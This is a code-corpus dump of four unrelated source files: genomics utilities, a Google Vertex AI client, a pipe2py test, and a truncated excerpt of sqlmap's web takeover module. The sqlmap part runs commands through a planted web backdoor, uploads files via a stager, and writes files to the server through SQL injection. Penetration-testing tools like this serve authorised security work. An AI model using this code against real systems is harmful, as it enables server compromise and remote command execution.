bsd-3-clause
| 13,756
|
"""
This module contains basic utilities for the suite, like e.g. database connection
and log creation.
"""
import os
import functools
import re
from typing import Union
from . import dbutils
from . import log_utils
import collections
import gzip
from itertools import zip_longest
from .overlap import overlap
from . import intervaltree
from .f1 import calc_f1
from .intervaltree import Interval, IntervalTree, IntervalNode, distance
import sys
__author__ = 'Luca Venturini'
# Diamond default: qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue bitscore
# BLASTX default: qaccver saccver pident length mismatch gapopen qstart qend sstart send evalue bitscore
from ..exceptions import InvalidConfiguration
blast_keys = "qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue bitscore ppos btop".split()
def comma_split(string):
"""Small utility to split a string based on comma. Useful for parsers."""
return string.split(",")
def path_join(output_dir, output_file):
"""Small utility to join together a directory path and
an output file, checking first that the output file is not
an absolute path.
:param output_dir: the output directory
:param output_file: the output file
"""
if os.path.isabs(output_file):
return output_file
else:
return os.path.join(output_dir,
output_file)
def memoize(obj):
"""
Function to memorize the results of functions/properties in memory for fast access.
Source: https://wiki.python.org/moin/PythonDecoratorLibrary#Memoize
:param obj: the object/function to memoize
:return:
"""
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def merge_partial(filenames, handle, logger=None, gzipped=False):
"""This function merges the partial files created by the multiprocessing into a single
sorted file.
:param filenames: the filenames to merge into the handle
:type filenames: list[str]
:param handle: the handle to use for printing
:type handle: io.TextIOWrapper
:param logger: logger to be used for the merging
"""
if logger is None:
logger = log_utils.create_null_logger("merger")
if len(filenames) == 0:
logger.warning("Nothing to merge. Exiting")
logger.debug("Starting to merge %d files (root: %s)",
len(filenames), "-".join(filenames[0].split("-")[:-1]))
current_lines = collections.defaultdict(list)
try:
if gzipped is False:
fnames = [open(_) for _ in filenames if os.stat(_).st_size > 0]
else:
fnames = [gzip.open(_, "rt") for _ in filenames if os.stat(_).st_size > 0]
except FileNotFoundError as exc:
raise FileNotFoundError((filenames, os.listdir(os.path.dirname(filenames[0]))))
if len(fnames) == 0:
logger.warning("All the files to merge (root %s) are empty. Exiting.",
"-".join(filenames[0].split("-")[:-1]))
[_.close() for _ in fnames]
return 0
for lines in zip_longest(*fnames):
for line in iter(_ for _ in lines if _ is not None):
_ = line.split("/")
index = int(_[0])
current_lines[index].append("/".join(_[1:]))
if len(current_lines) == 0:
logger.exception("Nothing found to merge for root %s. ERROR!.",
"-".join(filenames[0].split("-")[:-1]))
[_.close() for _ in fnames]
[os.remove(_) for _ in filenames]
raise IndexError
total = max(current_lines.keys())
logger.debug("Merging %d lines into %s", total, handle.name)
[_.close() for _ in fnames]
[os.remove(_) for _ in filenames]
for index in sorted(current_lines.keys()):
for line in current_lines[index]:
print(line, file=handle, end="")
del current_lines[index]
logger.debug("Merged %d lines into %s", total, handle.name)
handle.flush()
return total
def grouper(iterable, n):
"""
Function to chunk an iterable into slices of at most n elements.
:param iterable:
:param n:
:return:
"""
temp = []
for val in iterable:
temp.append(val)
if len(temp) >= n:
yield temp
temp = []
if temp:
yield temp
def merge_dictionaries(dict_a, dict_b, path=None):
"""Recursive function to merge two dictionaries.
:param dict_a: first dictionary
:type dict_a: dict
:param dict_b: second dictionary
:type dict_b: dict
:param path: list to be updated during recursion to indicate
that we are in a secondary node
:type path: list(str)
Source: http://stackoverflow.com/questions/7204805/dictionaries-of-dictionaries-merge
"""
if path is None:
path = []
for key in dict_b:
if key in dict_a and isinstance(dict_a[key], dict) and isinstance(dict_b[key], dict):
merge_dictionaries(
dict_a[key],
dict_b[key], path + [str(key)])
else:
dict_a[key] = dict_b[key]
return dict_a
def merge_ranges(ranges):
"""
Merge overlapping and adjacent ranges and yield the merged ranges
in order. The argument must be an iterable of pairs (start, stop).
>>> list(merge_ranges([(5,7), (3,5), (-1,3)]))
[(-1, 7)]
>>> list(merge_ranges([(5,6), (3,4), (1,2)]))
[(1, 2), (3, 4), (5, 6)]
>>> list(merge_ranges([]))
[]
"""
ranges = iter(sorted(ranges))
try:
current_start, current_stop = next(ranges)
except StopIteration:
return
for start, stop in ranges:
if start > current_stop:
# Gap between segments: output current segment and start a new one.
yield current_start, current_stop
current_start, current_stop = start, stop
else:
# Segments adjacent or overlapping: merge.
current_stop = max(current_stop, stop)
yield current_start, current_stop
_reg_pat = re.compile(r"^([^:]*):(\d*)(?:-|\.\.)(\d*)$")
def to_region(string: Union[str, bytes]) -> [str, int, int]:
"""
Snippet to convert from Apollo-style region to a tuple of chrom, start, end
:param string:
:return:
"""
if not isinstance(string, (str, bytes)):
raise ValueError("Invalid region: {} (type {})".format(string, type(string)))
elif isinstance(string, bytes):
string = string.decode()
string = string.strip()
try:
chrom, start, end = _reg_pat.search(string).groups()
start, end = int(start), int(end)
except (ValueError, AttributeError, TypeError):
raise ValueError("Invalid string specified: {}".format(string))
if end < start:
raise ValueError("Start greater than end: {0}\t{1}".format(start, end))
return chrom, start, end
def percentage(value):
value = float(value)
if value < 0:
raise ValueError("Negative numbers are not allowed")
elif value > 100:
raise ValueError("Only numbers between 0 and 100 are allowed")
while 1 < value <= 100:
value /= 100
return value
def default_for_serialisation(obj):
if isinstance(obj, set):
return tuple(obj)
elif obj == float("inf"):
return sys.maxsize
def to_bool(param: Union[str, bool, int, float]):
"""Function to convert a items to booleans."""
if isinstance(param, bool):
return param
elif isinstance(param, (int, float)):
if param == 1:
return True
elif param == 0:
return False
elif isinstance(param, (str, bytes)):
if isinstance(param, bytes):
param = param.decode()
lparam = param.lower()
if lparam == 'true' or lparam == "1":
return True
elif lparam == 'false' or lparam == "0":
return False
raise ValueError(f"Invalid boolean parameter: {param}")
|
lucventurini/mikado
|
Mikado/utilities/__init__.py
|
Python
|
lgpl-3.0
| 8,160
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.api_core import operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.aiplatform_v1beta1.services.migration_service import pagers
from google.cloud.aiplatform_v1beta1.types import migratable_resource
from google.cloud.aiplatform_v1beta1.types import migration_service
from .transports.base import MigrationServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import MigrationServiceGrpcTransport
from .transports.grpc_asyncio import MigrationServiceGrpcAsyncIOTransport
class MigrationServiceClientMeta(type):
"""Metaclass for the MigrationService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[MigrationServiceTransport]]
_transport_registry["grpc"] = MigrationServiceGrpcTransport
_transport_registry["grpc_asyncio"] = MigrationServiceGrpcAsyncIOTransport
def get_transport_class(cls, label: str = None,) -> Type[MigrationServiceTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class MigrationServiceClient(metaclass=MigrationServiceClientMeta):
"""A service that migrates resources from automl.googleapis.com,
datalabeling.googleapis.com and ml.googleapis.com to Vertex AI.
"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "aiplatform.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
MigrationServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
MigrationServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> MigrationServiceTransport:
"""Returns the transport used by the client instance.
Returns:
MigrationServiceTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def annotated_dataset_path(
project: str, dataset: str, annotated_dataset: str,
) -> str:
"""Returns a fully-qualified annotated_dataset string."""
return "projects/{project}/datasets/{dataset}/annotatedDatasets/{annotated_dataset}".format(
project=project, dataset=dataset, annotated_dataset=annotated_dataset,
)
@staticmethod
def parse_annotated_dataset_path(path: str) -> Dict[str, str]:
"""Parses a annotated_dataset path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/datasets/(?P<dataset>.+?)/annotatedDatasets/(?P<annotated_dataset>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def dataset_path(project: str, location: str, dataset: str,) -> str:
"""Returns a fully-qualified dataset string."""
return "projects/{project}/locations/{location}/datasets/{dataset}".format(
project=project, location=location, dataset=dataset,
)
@staticmethod
def parse_dataset_path(path: str) -> Dict[str, str]:
"""Parses a dataset path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/datasets/(?P<dataset>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def dataset_path(project: str, dataset: str,) -> str:
"""Returns a fully-qualified dataset string."""
return "projects/{project}/datasets/{dataset}".format(
project=project, dataset=dataset,
)
@staticmethod
def parse_dataset_path(path: str) -> Dict[str, str]:
"""Parses a dataset path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/datasets/(?P<dataset>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def dataset_path(project: str, location: str, dataset: str,) -> str:
"""Returns a fully-qualified dataset string."""
return "projects/{project}/locations/{location}/datasets/{dataset}".format(
project=project, location=location, dataset=dataset,
)
@staticmethod
def parse_dataset_path(path: str) -> Dict[str, str]:
"""Parses a dataset path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/datasets/(?P<dataset>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def model_path(project: str, location: str, model: str,) -> str:
"""Returns a fully-qualified model string."""
return "projects/{project}/locations/{location}/models/{model}".format(
project=project, location=location, model=model,
)
@staticmethod
def parse_model_path(path: str) -> Dict[str, str]:
"""Parses a model path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/models/(?P<model>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def model_path(project: str, location: str, model: str,) -> str:
"""Returns a fully-qualified model string."""
return "projects/{project}/locations/{location}/models/{model}".format(
project=project, location=location, model=model,
)
@staticmethod
def parse_model_path(path: str) -> Dict[str, str]:
"""Parses a model path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/models/(?P<model>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def version_path(project: str, model: str, version: str,) -> str:
"""Returns a fully-qualified version string."""
return "projects/{project}/models/{model}/versions/{version}".format(
project=project, model=model, version=version,
)
@staticmethod
def parse_version_path(path: str) -> Dict[str, str]:
"""Parses a version path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/models/(?P<model>.+?)/versions/(?P<version>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, MigrationServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the migration service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, MigrationServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(
util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
)
client_cert_source_func = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
is_mtls = True
client_cert_source_func = client_options.client_cert_source
else:
is_mtls = mtls.has_default_client_cert_source()
if is_mtls:
client_cert_source_func = mtls.default_client_cert_source()
else:
client_cert_source_func = None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
if is_mtls:
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted "
"values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, MigrationServiceTransport):
# transport is a MigrationServiceTransport instance.
if credentials or client_options.credentials_file:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=(
Transport == type(self).get_transport_class("grpc")
or Transport == type(self).get_transport_class("grpc_asyncio")
),
)
def search_migratable_resources(
self,
request: migration_service.SearchMigratableResourcesRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.SearchMigratableResourcesPager:
r"""Searches all of the resources in
automl.googleapis.com, datalabeling.googleapis.com and
ml.googleapis.com that can be migrated to Vertex AI's
given location.
Args:
request (google.cloud.aiplatform_v1beta1.types.SearchMigratableResourcesRequest):
The request object. Request message for
[MigrationService.SearchMigratableResources][google.cloud.aiplatform.v1beta1.MigrationService.SearchMigratableResources].
parent (str):
Required. The location that the migratable resources
should be searched from. It's the Vertex AI location
that the resources can be migrated to, not the
resources' original location. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.services.migration_service.pagers.SearchMigratableResourcesPager:
Response message for
[MigrationService.SearchMigratableResources][google.cloud.aiplatform.v1beta1.MigrationService.SearchMigratableResources].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a migration_service.SearchMigratableResourcesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, migration_service.SearchMigratableResourcesRequest):
request = migration_service.SearchMigratableResourcesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.search_migratable_resources
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.SearchMigratableResourcesPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def batch_migrate_resources(
self,
request: migration_service.BatchMigrateResourcesRequest = None,
*,
parent: str = None,
migrate_resource_requests: Sequence[
migration_service.MigrateResourceRequest
] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Batch migrates resources from ml.googleapis.com,
automl.googleapis.com, and datalabeling.googleapis.com
to Vertex AI.
Args:
request (google.cloud.aiplatform_v1beta1.types.BatchMigrateResourcesRequest):
The request object. Request message for
[MigrationService.BatchMigrateResources][google.cloud.aiplatform.v1beta1.MigrationService.BatchMigrateResources].
parent (str):
Required. The location of the migrated resource will
live in. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
migrate_resource_requests (Sequence[google.cloud.aiplatform_v1beta1.types.MigrateResourceRequest]):
Required. The request messages
specifying the resources to migrate.
They must be in the same location as the
destination. Up to 50 resources can be
migrated in one batch.
This corresponds to the ``migrate_resource_requests`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.aiplatform_v1beta1.types.BatchMigrateResourcesResponse`
Response message for
[MigrationService.BatchMigrateResources][google.cloud.aiplatform.v1beta1.MigrationService.BatchMigrateResources].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, migrate_resource_requests])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a migration_service.BatchMigrateResourcesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, migration_service.BatchMigrateResourcesRequest):
request = migration_service.BatchMigrateResourcesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if migrate_resource_requests is not None:
request.migrate_resource_requests = migrate_resource_requests
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.batch_migrate_resources]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
migration_service.BatchMigrateResourcesResponse,
metadata_type=migration_service.BatchMigrateResourcesOperationMetadata,
)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("MigrationServiceClient",)
|
sasha-gitg/python-aiplatform
|
google/cloud/aiplatform_v1beta1/services/migration_service/client.py
|
Python
|
apache-2.0
| 28,138
|
# Pipe pipe_zKJifuNS3BGLRQK_GsevXg generated by pipe2py
from pipe2py import Context
from pipe2py.modules.pipeforever import pipe_forever
from pipe2py.modules.pipefetch import pipe_fetch
from pipe2py.modules.pipesplit import pipe_split
from pipe2py.modules.pipecount import pipe_count
from pipe2py.modules.pipesimplemath import pipe_simplemath
from pipe2py.modules.pipesimplemath import pipe_simplemath
from pipe2py.modules.pipetruncate import pipe_truncate
from pipe2py.modules.pipeoutput import pipe_output
def pipe_zKJifuNS3BGLRQK_GsevXg(context=None, _INPUT=None, conf=None, **kwargs):
# todo: insert pipeline description here
conf = conf or {}
if context and context.describe_input:
return []
if context and context.describe_dependencies:
return [u'pipecount', u'pipefetch', u'pipeoutput', u'pipesimplemath', u'pipesplit', u'pipetruncate']
forever = pipe_forever()
sw_224 = pipe_fetch(
context, forever, conf={'URL': {'type': 'url', 'value': 'file://data/www.sciencedaily.com_rss_computers_math.html'}})
sw_250 = pipe_split(
context, sw_224, splits=2, conf=None)
sw_243 = pipe_count(
context, sw_250, conf=None)
sw_94 = pipe_simplemath(
context, sw_243, conf={'OTHER': {'type': 'number', 'value': '5'}, 'OP': {'type': 'text', 'value': 'modulo'}})
sw_169 = pipe_simplemath(
context, sw_243, OTHER=sw_94, conf={'OTHER': {'terminal': 'OTHER', 'type': 'number'}, 'OP': {'type': 'text', 'value': 'subtract'}})
sw_232 = pipe_truncate(
context, sw_250, count=sw_169, conf={'count': {'terminal': 'count', 'type': 'number'}})
_OUTPUT = pipe_output(
context, sw_232, conf=None)
return _OUTPUT
if __name__ == "__main__":
pipeline = pipe_zKJifuNS3BGLRQK_GsevXg(Context())
for i in pipeline:
print i
|
ganugapav/pipe
|
tests/pypipelines/pipe_zKJifuNS3BGLRQK_GsevXg.py
|
Python
|
gpl-2.0
| 1,875
|
#!/usr/bin/env python
#coding=utf-8
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import posixpath
import re
import StringIO
import tempfile
import urlparse
from extra.cloak.cloak import decloak
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getAutoDirectories
from lib.core.common import getManualDirectories
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSQLSnippet
from lib.core.common import getUnicode
from lib.core.common import ntToPosixSlashes
from lib.core.common import isTechniqueAvailable
from lib.core.common import isWindowsDriveLetterPath
from lib.core.common import normalizePath
from lib.core.common import parseFilePaths
from lib.core.common import posixToNtSlashes
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import singleTimeWarnMessage
from lib.core.convert import hexencode
from lib.core.convert import utf8encode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.enums import HTTP_HEADER
from lib.core.enums import OS
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.enums import WEB_API
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
from lib.core.settings import EVENTVALIDATION_REGEX
from lib.core.settings import VIEWSTATE_REGEX
from lib.request.connect import Connect as Request
from thirdparty.oset.pyoset import oset
class Web:
"""
这个类为插件定义了面向web的OS接管功能。
"""
def __init__(self):
self.webApi = None
self.webBaseUrl = None
self.webBackdoorUrl = None
self.webBackdoorFilePath = None
self.webStagerUrl = None
self.webStagerFilePath = None
self.webDirectory = None
def webBackdoorRunCmd(self, cmd):
if self.webBackdoorUrl is None:
return
output = None
if not cmd:
cmd = conf.osCmd
cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT)
if page is not None:
output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
if output:
output = output.group(1)
return output
def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):
if filepath is not None:
if filepath.endswith('_'):
content = decloak(filepath) # 隐藏文件
else:
with open(filepath, "rb") as f:
content = f.read()
if content is not None:
stream = StringIO.StringIO(content) # 字符串内容
return self._webFileStreamUpload(stream, destFileName, directory)
def _webFileStreamUpload(self, stream, destFileName, directory):
stream.seek(0) # Rewind
try:
setattr(stream, "name", destFileName)
except TypeError:
pass
if self.webApi in getPublicTypeMembers(WEB_API, True):
multipartParams = {
"upload": "1",
"file": stream,
"uploadDir": directory,
}
if self.webApi == WEB_API.ASPX:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE
page, _, _ = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = u"无法通过web file stager上传文件到'%s'" % directory
logger.warn(warnMsg)
return False
else:
return True
else:
logger.error(u"sqlmap没有一个web后门,也没有一个web文件stager的%s" % self.webApi)
return False
def _webFileInject(self, fileContent, fileName, directory):
outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
query = ""
if isTechniqueAvailable(kb.technique):
where = kb.injection.data[kb.technique].where
if where == PAYLOAD.WHERE.NEGATIVE:
randInt = randomInt()
query += "OR %d=%d " % (randInt, randInt)
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
query = agent.prefixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload)
return page
def webInit(self):
"""
